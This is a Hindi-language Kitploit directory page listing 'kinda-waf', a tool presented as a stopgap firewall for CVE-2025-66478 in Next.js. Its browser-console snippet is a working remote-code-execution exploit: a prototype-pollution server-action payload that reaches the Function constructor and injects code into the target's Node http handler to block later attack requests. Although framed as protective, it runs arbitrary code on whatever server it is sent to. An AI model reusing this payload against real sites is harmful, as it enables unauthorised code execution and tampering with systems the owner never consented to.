Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-66478-kinda-waf — आइए वेबसाइटों को तब तक सुरक्षित रखने में मदद करें जब तक उन्हें उचित रूप से पैच नहीं किया जाता! | Kitploit
उपकरण/GitHubGitHub/aiexz/cve-2025-66478-kinda-waf
भेद्यता स्कैनरशोषणआईडीएस/आईपीएस से बचनाWAF बाईपासवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubaiexz/cve-2025-66478-kinda-waf

CVE-2025-66478-kinda-waf

आइए वेबसाइटों को तब तक सुरक्षित रखने में मदद करें जब तक उन्हें उचित रूप से पैच नहीं किया जाता!

रिपॉजिटरी देखें
149 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

kinda-waf

सरल, अस्थायी WAF सुरक्षा परीक्षक जो एक विशिष्ट पेलोड अनुक्रम को लक्षित करता है।

आइए वेबसाइटों को तब तक सुरक्षित रहने में मदद करें जब तक उन्हें ठीक से पैच नहीं कर दिया जाता!

उद्देश्य

CVE-2025-66478 से सुरक्षा प्रदान करें, विशिष्ट पेलोड सिग्नेचर वाले अनुरोधों का पता लगाकर उन्हें ब्लॉक करें। इससे वैध ट्रैफ़िक पर कोई असर नहीं पड़ना चाहिए और जो वेबसाइटें ठीक से रखरखाव नहीं करतीं, उन्हें बचाना चाहिए।

और यह रीस्टार्ट के बाद रीसेट हो जाता है, इसलिए यह कोई स्थायी समाधान नहीं है

आवश्यकताएँ

  • Python 3

उपयोग

स्क्रिप्ट चलाएँ (डिफ़ॉल्ट localhost):

python main.py

किसी विशिष्ट URL के साथ चलाएँ:

python main.py http://example.com/

और ब्राउज़र में चलाने के लिए संस्करण:

हाँ, इसे सीधे ब्राउज़र कंसोल में चलाएँ:

const formData = new FormData();

const actionPayload = {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"throw(async()=>{const t=await import(\"node:http\"),e=t.IncomingMessage.prototype.emit;t.IncomingMessage.prototype.emit=function(t,...n){if(\"data\"===t&&n.length>0){const t=this.headers[\"content-type\"]||\"\";if(t.includes(\"multipart\")||t.includes(\"json\")||t.includes(\"text\")){const t=n[0].toString(\"utf8\");if(t.includes('\"then\":\"$1:__proto__:then\"')||t.includes('\"get\":\"$1:constructor:constructor\"')){const t=this.socket._httpMessage;if(t&&!t.headersSent)try{return t.writeHead(500,{\"Content-Type\":\"text/plain; charset=utf-8\",Connection:\"close\",\"X-Powered-By\":\"Next.js\"}),t.end('0:{\"a\":\"$@1\",\"f\":\"\",\"b\":\"cwwYVM2ZWm4vgZG3xVPfk\"}\\n1:E{\"digest\":\"2494231801\"}',(()=>this.destroy())),!1}catch(t){this.destroy()}else this.destroy();return!1}}}return e.apply(this,arguments)}})(),Object.assign(new Error(\"x\"),{digest:\"WAF Installed\"});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}

formData.append("0", JSON.stringify(actionPayload));
formData.append("1", '"$@0"');
formData.append("2", "[]");

fetch("/", {
  method: "POST",
  body: formData,
  headers: {
    "Next-Action": "x",
  }
})
  .then(async res => console.log(await res.text()));
टूल डाउनलोड करें